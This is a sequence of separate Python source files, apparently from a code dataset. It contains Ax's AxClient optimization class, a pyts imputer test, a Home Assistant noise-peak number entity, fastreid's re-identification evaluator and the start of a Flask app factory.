for use cases that require use of batches is coming soon.
Two custom types used in this class for convenience are `TParamValue` and
`TParameterization`. Those are shortcuts for `Union[str, bool, float, int]`
and `Dict[str, Union[str, bool, float, int]]`, respectively.
Args:
generation_strategy: Optional generation strategy. If not set, one is
intelligently chosen based on properties of search space.
db_settings: Settings for saving and reloading the underlying experiment
to a database. Expected to be of type
ax.storage.sqa_store.structs.DBSettings and require SQLAlchemy.
enforce_sequential_optimization: Whether to enforce that when it is
reasonable to switch models during the optimization (as prescribed
by `num_arms` in generation strategy), Ax will wait for enough trials
to be completed with data to proceed. Defaults to True. If set to
False, Ax will keep generating new trials from the previous model
until enough data is gathered. Use this only if necessary;
otherwise, it is more resource-efficient to
optimize sequentially, by waiting until enough data is available to
use the next model.
random_seed: Optional integer random seed, set to fix the optimization
random seed for reproducibility. Works only for Sobol quasi-random
generator and for BoTorch-powered models. For the latter models, the
            trials generated from the same optimization setup with the same seed
            will be mostly similar, but the exact parameter values may still vary,
            and trials later in the optimization will diverge more and more.
This is because a degree of randomness is essential for high performance
of the Bayesian optimization models and is not controlled by the seed.
Note: In multi-threaded environments, the random seed is thread-safe,
but does not actually guarantee reproducibility. Whether the outcomes
            will be exactly the same for two identical operations that use the random
            seed depends on whether the threads modify the random state in the
same order across the two operations.
verbose_logging: Whether Ax should log significant optimization events,
defaults to `True`.
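    Example:
        A minimal sketch of the intended cycle with a hypothetical quadratic
        objective (the parameter name "x" and metric name "y" are illustrative,
        not part of Ax itself):
            ax_client = AxClient()
            ax_client.create_experiment(
                name="quadratic",
                parameters=[{"name": "x", "type": "range", "bounds": [-5.0, 5.0]}],
                objective_name="y",
                minimize=True,
            )
            for _ in range(5):
                parameters, trial_index = ax_client.get_next_trial()
                ax_client.complete_trial(
                    trial_index=trial_index, raw_data=(parameters["x"] ** 2, 0.0)
                )
            best_parameters, values = ax_client.get_best_parameters()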
"""
def __init__(
self,
generation_strategy: Optional[GenerationStrategy] = None,
db_settings: Any = None,
enforce_sequential_optimization: bool = True,
random_seed: Optional[int] = None,
verbose_logging: bool = True,
) -> None:
if not verbose_logging:
logger.setLevel(logging.WARNING)
else:
logger.info(
"Starting optimization with verbose logging. To disable logging, "
"set the `verbose_logging` argument to `False`. Note that float "
"values in the logs are rounded to 2 decimal points."
)
self._generation_strategy = generation_strategy
if db_settings and (not DBSettings or not isinstance(db_settings, DBSettings)):
raise ValueError(
"`db_settings` argument should be of type ax.storage.sqa_store."
"structs.DBSettings. To use `DBSettings`, you will need SQLAlchemy "
"installed in your environment (can be installed through pip)."
)
self.db_settings = db_settings
self._experiment: Optional[Experiment] = None
self._enforce_sequential_optimization = enforce_sequential_optimization
self._random_seed = random_seed
if random_seed is not None:
logger.warning(
f"Random seed set to {random_seed}. Note that this setting "
"only affects the Sobol quasi-random generator "
"and BoTorch-powered Bayesian optimization models. For the latter "
"models, setting random seed to the same number for two optimizations "
"will make the generated trials similar, but not exactly the same, "
"and over time the trials will diverge more."
)
# Trials, for which we received data since last `GenerationStrategy.gen`,
# used to make sure that generation strategy is updated with new data.
self._updated_trials: List[int] = []
# ------------------------ Public API methods. ------------------------
def create_experiment(
self,
parameters: List[Dict[str, Union[TParamValue, List[TParamValue]]]],
name: Optional[str] = None,
objective_name: Optional[str] = None,
minimize: bool = False,
parameter_constraints: Optional[List[str]] = None,
outcome_constraints: Optional[List[str]] = None,
status_quo: Optional[TParameterization] = None,
overwrite_existing_experiment: bool = False,
experiment_type: Optional[str] = None,
) -> None:
"""Create a new experiment and save it if DBSettings available.
Args:
parameters: List of dictionaries representing parameters in the
experiment search space. Required elements in the dictionaries
are: "name" (name of this parameter, string), "type" (type of the
parameter: "range", "fixed", or "choice", string), and "bounds"
for range parameters (list of two values, lower bound first),
"values" for choice parameters (list of values), and "value" for
fixed parameters (single value).
            objective_name: Name of the metric used as objective in this experiment.
This metric must be present in `raw_data` argument to `complete_trial`.
name: Name of the experiment to be created.
minimize: Whether this experiment represents a minimization problem.
parameter_constraints: List of string representation of parameter
constraints, such as "x3 >= x4" or "x3 + x4 + x5 >= 2". For sum
constraints, any number of arguments is accepted, and acceptable
operators are "<=" and ">=".
outcome_constraints: List of string representation of outcome
constraints of form "metric_name >= bound", like "m1 <= 3."
status_quo: Parameterization of the current state of the system.
If set, this will be added to each trial to be evaluated alongside
test configurations.
overwrite_existing_experiment: If `DBSettings` were provided on
instantiation and the experiment being created has the same name
as some experiment already stored, whether to overwrite the
existing experiment. Defaults to False.
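        Example `parameters` value (a sketch; the names are illustrative only):
            [
                {"name": "lr", "type": "range", "bounds": [1e-4, 1e-1]},
                {"name": "batch_size", "type": "choice", "values": [16, 32, 64]},
                {"name": "optimizer", "type": "fixed", "value": "adam"},
            ]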
"""
if self.db_settings and not name:
raise ValueError( # pragma: no cover
"Must give the experiment a name if `db_settings` is not None."
)
if self.db_settings:
existing = None
try:
existing, _ = load_experiment_and_generation_strategy(
experiment_name=not_none(name), db_settings=self.db_settings
)
except ValueError: # Experiment does not exist, nothing to do.
pass
if existing and overwrite_existing_experiment:
logger.info(f"Overwriting existing experiment {name}.")
elif existing:
raise ValueError(
f"Experiment {name} exists; set the `overwrite_existing_"
"experiment` to `True` to overwrite with new experiment "
"or use `ax_client.load_experiment_from_database` to "
"continue an existing experiment."
)
self._experiment = make_experiment(
name=name,
parameters=parameters,
objective_name=objective_name,
minimize=minimize,
parameter_constraints=parameter_constraints,
outcome_constraints=outcome_constraints,
status_quo=status_quo,
experiment_type=experiment_type,
)
if self._generation_strategy is None:
self._generation_strategy = choose_generation_strategy(
search_space=self._experiment.search_space,
enforce_sequential_optimization=self._enforce_sequential_optimization,
random_seed=self._random_seed,
)
self._save_experiment_and_generation_strategy_to_db_if_possible(
overwrite_existing_experiment=True
)
def get_next_trial(self) -> Tuple[TParameterization, int]:
"""
Generate trial with the next set of parameters to try in the iteration process.
Note: Service API currently supports only 1-arm trials.
Returns:
Tuple of trial parameterization, trial index
"""
trial = self.experiment.new_trial(generator_run=self._gen_new_generator_run())
logger.info(
f"Generated new trial {trial.index} with parameters "
f"{_round_floats_for_logging(item=not_none(trial.arm).parameters)}."
)
trial.mark_dispatched()
self._updated_trials = []
self._save_experiment_and_generation_strategy_to_db_if_possible()
return not_none(trial.arm).parameters, trial.index
def complete_trial(
self,
trial_index: int,
raw_data: TEvaluationOutcome,
metadata: Optional[Dict[str, Union[str, int]]] = None,
sample_size: Optional[int] = None,
) -> None:
"""
Completes the trial with given metric values and adds optional metadata
to it.
Args:
trial_index: Index of trial within the experiment.
raw_data: Evaluation data for the trial. Can be a mapping from
metric name to a tuple of mean and SEM, just a tuple of mean and
SEM if only one metric in optimization, or just the mean if there
is no SEM. Can also be a list of (fidelities, mapping from
metric name to a tuple of mean and SEM).
metadata: Additional metadata to track about this run.
sample_size: Number of samples collected for the underlying arm,
optional.
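        Example `raw_data` values for a single objective "y" (illustrative only):
            {"y": (10.2, 0.5)}   # mapping from metric name to (mean, SEM)
            (10.2, 0.5)          # shorthand when there is only one metric
            10.2                 # mean only, when SEM is unknown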
"""
assert isinstance(
trial_index, int
), f"Trial index must be an int, got: {trial_index}." # pragma: no cover
trial = self._get_trial(trial_index=trial_index)
if metadata is not None:
trial._run_metadata = metadata
arm_name = not_none(trial.arm).name
evaluations = {
arm_name: raw_data_to_evaluation(
raw_data=raw_data, objective_name=self.objective_name
)
}
sample_sizes = {arm_name: sample_size} if sample_size else {}
data = data_from_evaluations(
evaluations=evaluations,
trial_index=trial.index,
sample_sizes=sample_sizes,
start_time=(
checked_cast_optional(int, metadata.get("start_time"))
if metadata is not None
else None
),
end_time=(
checked_cast_optional(int, metadata.get("end_time"))
if metadata is not None
else None
),
)
# In service API, a trial may be completed multiple times (for multiple
# metrics, for example).
trial.mark_completed(allow_repeat_completion=True)
self.experiment.attach_data(data)
data_for_logging = _round_floats_for_logging(
item=evaluations[next(iter(evaluations.keys()))]
)
logger.info(
f"Completed trial {trial_index} with data: "
f"{_round_floats_for_logging(item=data_for_logging)}."
)
self._updated_trials.append(trial_index)
self._save_experiment_and_generation_strategy_to_db_if_possible()
def log_trial_failure(
self, trial_index: int, metadata: Optional[Dict[str, str]] = None
) -> None:
"""Mark that the given trial has failed while running.
Args:
trial_index: Index of trial within the experiment.
metadata: Additional metadata to track about this run.
"""
trial = self.experiment.trials[trial_index]
trial.mark_failed()
logger.info(f"Registered failure of trial {trial_index}.")
if metadata is not None:
trial._run_metadata = metadata
self._save_experiment_and_generation_strategy_to_db_if_possible()
def attach_trial(
self, parameters: TParameterization
) -> Tuple[TParameterization, int]:
"""Attach a new trial with the given parameterization to the experiment.
Args:
parameters: Parameterization of the new trial.
Returns:
Tuple of parameterization and trial index from newly created trial.
"""
trial = self.experiment.new_trial().add_arm(Arm(parameters=parameters))
trial.mark_dispatched()
logger.info(
"Attached custom parameterization "
f"{_round_floats_for_logging(item=parameters)} as trial {trial.index}."
)
self._save_experiment_and_generation_strategy_to_db_if_possible()
return not_none(trial.arm).parameters, trial.index
def get_trial_parameters(self, trial_index: int) -> TParameterization:
"""Retrieve the parameterization of the trial by the given index."""
return not_none(self._get_trial(trial_index).arm).parameters
@copy_doc(best_point_utils.get_best_parameters)
def get_best_parameters(
self
) -> Optional[Tuple[TParameterization, Optional[TModelPredictArm]]]:
return best_point_utils.get_best_parameters(self.experiment)
def get_trials_data_frame(self) -> pd.DataFrame:
return exp_to_df(exp=self.experiment)
def get_recommended_max_parallelism(self) -> List[Tuple[int, int]]:
"""Recommends maximum number of trials that can be scheduled in parallel
at different stages of optimization.
Some optimization algorithms profit significantly from sequential
optimization (e.g. suggest a few points, get updated with data for them,
repeat). This setting indicates how many trials should be in flight
(generated, but not yet completed with data).
The output of this method is mapping of form
{num_trials -> max_parallelism_setting}, where the max_parallelism_setting
is used for num_trials trials. If max_parallelism_setting is -1, as
many of the trials can be ran in parallel, as necessary. If num_trials
in a tuple is -1, then the corresponding max_parallelism_setting
should be used for all subsequent trials.
For example, if the returned list is [(5, -1), (12, 6), (-1, 3)],
the schedule could be: run 5 trials in parallel, run 6 trials in
parallel twice, run 3 trials in parallel for as long as needed. Here,
'running' a trial means obtaining a next trial from `AxClient` through
get_next_trials and completing it with data when available.
Returns:
Mapping of form {num_trials -> max_parallelism_setting}.
"""
parallelism_settings = []
for step in self.generation_strategy._steps:
parallelism_settings.append(
(step.num_arms, step.recommended_max_parallelism or step.num_arms)
)
return parallelism_settings
def get_optimization_trace(
self, objective_optimum: Optional[float] = None
) -> AxPlotConfig:
"""Retrieves the plot configuration for optimization trace, which shows
the evolution of the objective mean over iterations.
Args:
objective_optimum: Optimal objective, if known, for display in the
visualization.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
objective_name = self.experiment.optimization_config.objective.metric.name
best_objectives = np.array(
[
[
checked_cast(Trial, trial).objective_mean
for trial in self.experiment.trials.values()
]
]
)
hover_labels = [
_format_dict(not_none(checked_cast(Trial, trial).arm).parameters)
for trial in self.experiment.trials.values()
]
return optimization_trace_single_method(
y=(
np.minimum.accumulate(best_objectives, axis=1)
if self.experiment.optimization_config.objective.minimize
else np.maximum.accumulate(best_objectives, axis=1)
),
optimum=objective_optimum,
title="Model performance vs. # of iterations",
ylabel=objective_name.capitalize(),
hover_labels=hover_labels,
)
def get_contour_plot(
self,
param_x: Optional[str] = None,
param_y: Optional[str] = None,
metric_name: Optional[str] = None,
) -> AxPlotConfig:
"""Retrieves a plot configuration for a contour plot of the response
surface. For response surfaces with more than two parameters,
selected two parameters will appear on the axes, and remaining parameters
will be affixed to the middle of their range. If contour params arguments
are not provided, the first two parameters in the search space will be
used. If contour metrics are not provided, objective will be used.
Args:
param_x: name of parameters to use on x-axis for
the contour response surface plots.
param_y: name of parameters to use on y-axis for
the contour response surface plots.
metric_name: Name of the metric, for which to plot the response
surface.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
if len(self.experiment.parameters) < 2:
raise ValueError(
"Cannot create a contour plot as experiment has less than 2 "
"parameters, but a contour-related argument was provided."
)
if (param_x or param_y) and not (param_x and param_y):
raise ValueError(
"If `param_x` is provided, `param_y` is "
"required as well, and vice-versa."
)
objective_name = self.objective_name
if not metric_name:
metric_name = objective_name
if not param_x or not param_y:
parameter_names = list(self.experiment.parameters.keys())
param_x = parameter_names[0]
param_y = parameter_names[1]
if param_x not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_x}" not found in the optimization search space.'
)
if param_y not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_y}" not found in the optimization search space.'
)
if metric_name not in self.experiment.metrics:
raise ValueError(
f'Metric "{metric_name}" is not associated with this optimization.'
)
if self.generation_strategy.model is not None:
try:
logger.info(
f"Retrieving contour plot with parameter '{param_x}' on X-axis "
f"and '{param_y}' on Y-axis, for metric '{metric_name}'. "
"Ramaining parameters are affixed to the middle of their range."
)
return plot_contour(
model=not_none(self.generation_strategy.model),
param_x=param_x,
param_y=param_y,
metric_name=metric_name,
)
except NotImplementedError:
# Some models don't implement '_predict', which is needed
# for the contour plots.
logger.info(
f"Model {self.generation_strategy.model} does not implement "
"`predict`, so it cannot be used to generate a response "
"surface plot."
)
raise ValueError(
f'Could not obtain contour plot of "{metric_name}" for parameters '
f'"{param_x}" and "{param_y}", as a model with predictive ability, '
"such as a Gaussian Process, has not yet been trained in the course "
"of this optimization."
)
def load_experiment_from_database(self, experiment_name: str) -> None:
"""Load an existing experiment from database using the `DBSettings`
passed to this `AxClient` on instantiation.
Args:
experiment_name: Name of the experiment.
Returns:
Experiment object.
"""
if not self.db_settings:
raise ValueError( # pragma: no cover
"Cannot load an experiment in the absence of the DB settings."
"Please initialize `AxClient` with DBSettings."
)
experiment, generation_strategy = load_experiment_and_generation_strategy(
experiment_name=experiment_name, db_settings=self.db_settings
)
self._experiment = experiment
logger.info(f"Loaded {experiment}.")
if generation_strategy is None: # pragma: no cover
self._generation_strategy = choose_generation_strategy(
search_space=self._experiment.search_space,
enforce_sequential_optimization=self._enforce_sequential_optimization,
random_seed=self._random_seed,
)
else:
self._generation_strategy = generation_strategy
logger.info(
f"Using generation strategy associated with the loaded experiment:"
f" {generation_strategy}."
)
def get_model_predictions(
self, metric_names: Optional[List[str]] = None
) -> Dict[int, Dict[str, Tuple[float, float]]]:
"""Retrieve model-estimated means and covariances for all metrics.
Note: this function retrieves the predictions for the 'in-sample' arms,
        which means that the mapping returned by this function will only contain
predictions for trials that have been completed with data.
Args:
metric_names: Names of the metrics, for which to retrieve predictions.
All metrics on experiment will be retrieved if this argument was
not specified.
Returns:
A mapping from trial index to a mapping of metric names to tuples
of predicted metric mean and SEM, of form:
{ trial_index -> { metric_name: ( mean, SEM ) } }.
"""
if self.generation_strategy.model is None: # pragma: no cover
raise ValueError("No model has been instantiated yet.")
if metric_names is None and self.experiment.metrics is None:
raise ValueError( # pragma: no cover
"No metrics to retrieve specified on the experiment or as "
"argument to `get_model_predictions`."
)
arm_info, _, _ = _get_in_sample_arms(
model=not_none(self.generation_strategy.model),
metric_names=set(metric_names)
if metric_names is not None
else set(not_none(self.experiment.metrics).keys()),
)
trials = checked_cast_dict(int, Trial, self.experiment.trials)
return {
trial_index: {
m: (
arm_info[not_none(trials[trial_index].arm).name].y_hat[m],
arm_info[not_none(trials[trial_index].arm).name].se_hat[m],
)
for m in arm_info[not_none(trials[trial_index].arm).name].y_hat
}
for trial_index in trials
if not_none(trials[trial_index].arm).name in arm_info
}
def verify_trial_parameterization(
self, trial_index: int, parameterization: TParameterization
) -> bool:
"""Whether the given parameterization matches that of the arm in the trial
specified in the trial index.
"""
return (
not_none(self._get_trial(trial_index=trial_index).arm).parameters
== parameterization
)
# ------------------ JSON serialization & storage methods. -----------------
def save_to_json_file(self, filepath: str = "ax_client_snapshot.json") -> None:
"""Save a JSON-serialized snapshot of this `AxClient`'s settings and state
to a .json file by the given path.
"""
with open(filepath, "w+") as file: # pragma: no cover
file.write(json.dumps(self.to_json_snapshot()))
logger.info(f"Saved JSON-serialized state of optimization to `{filepath}`.")
@staticmethod
def load_from_json_file(filepath: str = "ax_client_snapshot.json") -> "AxClient":
"""Restore an `AxClient` and its state from a JSON-serialized snapshot,
residing in a .json file by the given path.
"""
with open(filepath, "r") as file: # pragma: no cover
serialized = json.loads(file.read())
return AxClient.from_json_snapshot(serialized=serialized)
def to_json_snapshot(self) -> Dict[str, Any]:
"""Serialize this `AxClient` to JSON to be able to interrupt and restart
optimization and save it to file by the provided path.
Returns:
A JSON-safe dict representation of this `AxClient`.
"""
return {
"_type": self.__class__.__name__,
"experiment": object_to_json(self._experiment),
"generation_strategy": object_to_json(self._generation_strategy),
"_enforce_sequential_optimization": self._enforce_sequential_optimization,
"_updated_trials": object_to_json(self._updated_trials),
}
@staticmethod
def from_json_snapshot(serialized: Dict[str, Any]) -> "AxClient":
"""Recreate an `AxClient` from a JSON snapshot."""
experiment = object_from_json(serialized.pop("experiment"))
serialized_generation_strategy = serialized.pop("generation_strategy")
ax_client = AxClient(
generation_strategy=generation_strategy_from_json(
generation_strategy_json=serialized_generation_strategy
)
if serialized_generation_strategy is not None
else None,
enforce_sequential_optimization=serialized.pop(
"_enforce_sequential_optimization"
),
)
ax_client._experiment = experiment
ax_client._updated_trials = object_from_json(serialized.pop("_updated_trials"))
return ax_client
# ---------------------- Private helper methods. ---------------------
@property
def experiment(self) -> Experiment:
"""Returns the experiment set on this Ax client."""
if self._experiment is None:
raise ValueError(
"Experiment not set on Ax client. Must first "
"call load_experiment or create_experiment to use handler functions."
)
return not_none(self._experiment)
@property
def generation_strategy(self) -> GenerationStrategy:
"""Returns the generation strategy, set on this experiment."""
if self._generation_strategy is None:
raise ValueError(
"No generation strategy has been set on this optimization yet."
)
return not_none(self._generation_strategy)
@property
def objective_name(self) -> str:
"""Returns the name of the objective in this optimization."""
opt_config = not_none(self.experiment.optimization_config)
return opt_config.objective.metric.name
def _save_experiment_and_generation_strategy_to_db_if_possible(
self, overwrite_existing_experiment: bool = False
) -> bool:
"""Saves attached experiment and generation strategy if DB settings are
set on this AxClient instance.
Args:
overwrite_existing_experiment: If the experiment being created
has the same name as some experiment already stored, this flag
determines whether to overwrite the existing experiment.
Defaults to False.
Returns:
bool: Whether the experiment was saved.
"""
if self.db_settings is not None:
save_experiment_and_generation_strategy(
experiment=self.experiment,
generation_strategy=self.generation_strategy,
db_settings=self.db_settings,
overwrite_existing_experiment=overwrite_existing_experiment,
)
return True
return False
def _get_new_data(self) -> Data:
"""
Returns new data since the last run of the generator.
Returns:
Latest data.
"""
return Data.from_multiple_data(
[
self.experiment.lookup_data_for_trial(idx)[0]
for idx in self._updated_trials
]
)
def _gen_new_generator_run(self, n: int = 1) -> GeneratorRun:
"""Generate new generator run for this experiment.
Args:
n: Number of arms to generate.
"""
new_data = self._get_new_data()
# If random seed is not set for this optimization, context manager does
# nothing; otherwise, it sets the random seed for torch, but only for the
# scope of this call. This is important because torch seed is set globally,
# so if we just set the seed without the context manager, it can have
# serious negative impact on the performance of the models that employ
# stochasticity.
        with manual_seed(seed=self._random_seed), warnings.catch_warnings():
# Filter out GPYTorch warnings to avoid confusing users.
warnings.simplefilter("ignore")
return not_none(self.generation_strategy).gen(
experiment=self.experiment,
new_data=new_data,
n=n,
pending_observations=get_pending_observation_features(
experiment=self.experiment
),
)
def _get_trial(self, trial_index: int) -> Trial:
"""Gets trial by given index or raises an error if it does not exist."""
if trial_index in self.experiment.trials:
trial = self.experiment.trials.get(trial_index)
if not isinstance(trial, Trial):
raise NotImplementedError(
"`AxClient` only supports `Trial`, not `BatchTrial`."
)
return trial
raise ValueError(f"Trial {trial_index} does not yet exist.")
def _find_last_trial_with_parameterization(
self, parameterization: TParameterization
) -> int:
"""Given a parameterization, find the last trial in the experiment that
contains an arm with that parameterization.
"""
for trial_idx in reversed(sorted(self.experiment.trials.keys())):
if not_none(self._get_trial(trial_idx).arm).parameters == parameterization:
return trial_idx
raise ValueError(
f"No trial on experiment matches parameterization {parameterization}."
)
# -------- Backward-compatibility with old save / load method names. -------
@staticmethod
def load_experiment(experiment_name: str) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def load(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def save(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `save_to_json_file` to save optimization state to .json file."
)
|
the-stack_106_16870
|
"""Testing for imputers."""
# Author: Johann Faouzi <[email protected]>
# License: BSD-3-Clause
import numpy as np
import pytest
import re
from pyts.preprocessing import InterpolationImputer
X = [[np.nan, 1, 2, 3, np.nan, 5, 6, np.nan]]
@pytest.mark.parametrize(
'params, error, err_msg',
[({'missing_values': np.inf}, ValueError,
"'missing_values' cannot be infinity."),
({'missing_values': "3"}, ValueError,
"'missing_values' must be an integer, a float, None or np.nan "
"(got {0!s})".format("3")),
({'strategy': 'whoops'}, ValueError,
"'strategy' must be an integer or one of 'linear', 'nearest', "
"'zero', 'slinear', 'quadratic', 'cubic', 'previous', 'next' "
"(got {0})".format('whoops'))]
)
def test_parameter_check(params, error, err_msg):
"""Test parameter validation."""
imputer = InterpolationImputer(**params)
with pytest.raises(error, match=re.escape(err_msg)):
imputer.transform(X)
@pytest.mark.parametrize(
'params, X, arr_desired',
[({'missing_values': None}, [[None, 10, 8, None, 4, 2, None]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': np.nan}, [[np.nan, 10, 8, np.nan, 4, 2, np.nan]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': 45.}, [[45., 10, 8, 45., 4, 2, 45.]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': 78}, [[78, 10, 8, 78, 4, 2, 78]],
[[12, 10, 8, 6, 4, 2, 0]]),
({'missing_values': None, 'strategy': 'quadratic'},
[[None, 9, 4, None, 0, 1, None]], [[16, 9, 4, 1, 0, 1, 4]]),
({'missing_values': None, 'strategy': 'previous'},
[[5, 9, 4, None, 0, 1, None]], [[5, 9, 4, 4, 0, 1, 1]]),
({'missing_values': None, 'strategy': 'next'},
[[None, 9, 4, None, 0, 1, 8]], [[9, 9, 4, 0, 0, 1, 8]])]
)
def test_actual_results(params, X, arr_desired):
"""Test that the actual results are the expected ones."""
imputer = InterpolationImputer(**params)
arr_actual = imputer.fit_transform(X)
np.testing.assert_allclose(arr_actual, arr_desired, rtol=0, atol=1e-5)
|
the-stack_106_16871
|
"""Select platform for Advantage Air integration."""
import logging
from homeassistant.components.ffmpeg import CONF_INPUT
from homeassistant.components.number import NumberEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_NAME, Platform
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .const import CONF_PEAK, DOMAIN
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up Noise Detection select platform."""
entity = NoiseDetectionPeakNumber(hass, config_entry)
async_add_entities([entity])
hass.data[DOMAIN].setdefault(config_entry.entry_id, {})
hass.data[DOMAIN][config_entry.entry_id][Platform.NUMBER] = {
"entity": entity,
"updated_by": False,
}
class NoiseDetectionPeakNumber(NumberEntity):
"""A Number Entity to control the peak value of the noise sensor dynamically."""
def __init__(self, hass: HomeAssistant, config_entry: ConfigEntry) -> None:
"""Initialise the NoiseDetectionPeakNumber class."""
super().__init__()
self.hass = hass
self.config_entry = config_entry
self._attr_max_value = 0
self._attr_min_value = -100
self._attr_step = 1
# self._attr_value = float(config_entry.data[CONF_PEAK] * -1)
self._attr_value = float(config_entry.data[CONF_PEAK])
self._attr_name = f'{self.config_entry.data["name"]} Peak'
async def async_set_value(self, value: float) -> None:
"""Update the current value."""
_LOGGER.info("Number async_set_value called")
new_config = {}
for key in self.config_entry.data.keys():
new_config[key] = self.config_entry.data[key]
# new_config[CONF_PEAK] = int(value) * -1
new_config[CONF_PEAK] = int(value)
self._attr_value = value
self.hass.data[DOMAIN][self.config_entry.entry_id][Platform.NUMBER][
"updated_by"
] = True
self.hass.config_entries.async_update_entry(
self.config_entry,
data=new_config,
)
_LOGGER.info(
"%s has set the nosie level to %d",
new_config["name"],
new_config[CONF_PEAK],
)
def update_value(self, value: float) -> None:
"""Update the current value without updating the config entry."""
self._attr_value = value
@property
def unique_id(self):
"""Return Unique ID string."""
return f"{DOMAIN}_binary_{self.config_entry.data.get(CONF_INPUT)}"
@property
def device_info(self):
"""Information about this entity/device."""
return {
"name": self.config_entry.data.get(CONF_NAME),
"model": "ffmpeg",
}
|
the-stack_106_16872
|
# encoding: utf-8
"""
@author: liaoxingyu
@contact: [email protected]
"""
import copy
import logging
import time
import itertools
from collections import OrderedDict
import numpy as np
import torch
import torch.nn.functional as F
from sklearn import metrics
from fastreid.utils import comm
from fastreid.utils.compute_dist import build_dist
from .evaluator import DatasetEvaluator
from .query_expansion import aqe
from .rank_cylib import compile_helper
logger = logging.getLogger(__name__)
class ReidEvaluator(DatasetEvaluator):
def __init__(self, cfg, num_query, output_dir=None):
self.cfg = cfg
self._num_query = num_query
self._output_dir = output_dir
self._cpu_device = torch.device('cpu')
self._predictions = []
self._compile_dependencies()
def reset(self):
self._predictions = []
def process(self, inputs, outputs):
prediction = {
'feats': outputs.to(self._cpu_device, torch.float32),
'pids': inputs['targets'].to(self._cpu_device),
'camids': inputs['camids'].to(self._cpu_device)
}
self._predictions.append(prediction)
def evaluate(self):
if comm.get_world_size() > 1:
comm.synchronize()
predictions = comm.gather(self._predictions, dst=0)
predictions = list(itertools.chain(*predictions))
if not comm.is_main_process():
return {}
else:
predictions = self._predictions
features = []
pids = []
camids = []
for prediction in predictions:
features.append(prediction['feats'])
pids.append(prediction['pids'])
camids.append(prediction['camids'])
features = torch.cat(features, dim=0)
pids = torch.cat(pids, dim=0).numpy()
camids = torch.cat(camids, dim=0).numpy()
# query feature, person ids and camera ids
query_features = features[:self._num_query]
query_pids = pids[:self._num_query]
query_camids = camids[:self._num_query]
# gallery features, person ids and camera ids
gallery_features = features[self._num_query:]
gallery_pids = pids[self._num_query:]
gallery_camids = camids[self._num_query:]
self._results = OrderedDict()
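        # Optional AQE (alpha query expansion): expand query/gallery features with
        # their top-k neighbours before computing the distance matrix.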
if self.cfg.TEST.AQE.ENABLED:
logger.info("Test with AQE setting")
qe_time = self.cfg.TEST.AQE.QE_TIME
qe_k = self.cfg.TEST.AQE.QE_K
alpha = self.cfg.TEST.AQE.ALPHA
query_features, gallery_features = aqe(query_features, gallery_features, qe_time, qe_k, alpha)
dist = build_dist(query_features, gallery_features, self.cfg.TEST.METRIC)
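        # Optional k-reciprocal re-ranking: blend the Jaccard re-ranked distance
        # with the original distance using lambda_value.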
if self.cfg.TEST.RERANK.ENABLED:
logger.info("Test with rerank setting")
k1 = self.cfg.TEST.RERANK.K1
k2 = self.cfg.TEST.RERANK.K2
lambda_value = self.cfg.TEST.RERANK.LAMBDA
if self.cfg.TEST.METRIC == "cosine":
query_features = F.normalize(query_features, dim=1)
gallery_features = F.normalize(gallery_features, dim=1)
rerank_dist = build_dist(query_features, gallery_features, metric="jaccard", k1=k1, k2=k2)
dist = rerank_dist * (1 - lambda_value) + dist * lambda_value
from .rank import evaluate_rank
cmc, all_AP, all_INP = evaluate_rank(dist, query_pids, gallery_pids, query_camids, gallery_camids)
mAP = np.mean(all_AP)
mINP = np.mean(all_INP)
for r in [1, 3, 5, 10]:
self._results['Rank-{}'.format(r)] = cmc[r - 1] * 100
self._results['mAP'] = mAP * 100
self._results['mINP'] = mINP * 100
self._results["metric"] = (mAP + cmc[0]) / 2 * 100
if self.cfg.TEST.ROC.ENABLED:
from .roc import evaluate_roc
scores, labels = evaluate_roc(dist, query_pids, gallery_pids, query_camids, gallery_camids)
fprs, tprs, thres = metrics.roc_curve(labels, scores)
for fpr in [1e-4, 1e-3, 1e-2]:
ind = np.argmin(np.abs(fprs - fpr))
self._results["TPR@FPR={:.0e}".format(fpr)] = tprs[ind]
return copy.deepcopy(self._results)
def _compile_dependencies(self):
        # Since we only evaluate results on rank(0), we just need to compile the
        # cython evaluation tool on rank(0)
if comm.is_main_process():
try:
from .rank_cylib.rank_cy import evaluate_cy
except ImportError:
start_time = time.time()
logger.info("> compiling reid evaluation cython tool")
compile_helper()
logger.info(
">>> done with reid evaluation cython tool. Compilation time: {:.3f} "
"seconds".format(time.time() - start_time))
comm.synchronize()
|
the-stack_106_16876
|
# __init__.py is a special Python file that allows a directory to become
# a Python package so it can be accessed using the 'import' statement.
from datetime import datetime
import os
import logging
from flask_script import Manager
from flask import Flask, request
from flask_sqlalchemy import SQLAlchemy
from flask_mail import Mail
from flask_migrate import Migrate, MigrateCommand
from flask_wtf.csrf import CSRFProtect
from flask_scss import Scss
from flask_user import UserManager, current_user
from flask_admin import Admin
from werkzeug.local import LocalProxy
logging.getLogger().setLevel(logging.INFO)
app = None
current_project = None
user_manager = None
# Instantiate Flask extensions
csrf_protect = CSRFProtect()
db = SQLAlchemy()
mail = Mail()
migrate = Migrate()
flask_admin = Admin(url='/admin/flask_admin')
# Initialize Flask Application
def create_app(extra_config_settings={}):
"""Create a Flask application.
"""
global app, current_project, user_manager
# Instantiate Flask
app = Flask(__name__)
app.logger.info("Created Flask Application")
# Load common settings
app.config.from_object('app.settings')
# Load environment specific settings
app.config.from_object('app.local_settings')
# Load extra settings from extra_config_settings param
app.config.update(extra_config_settings)
# import utils here, because they need the initialized app variable
from app import utils
current_project = LocalProxy(lambda: utils.get_current_project())
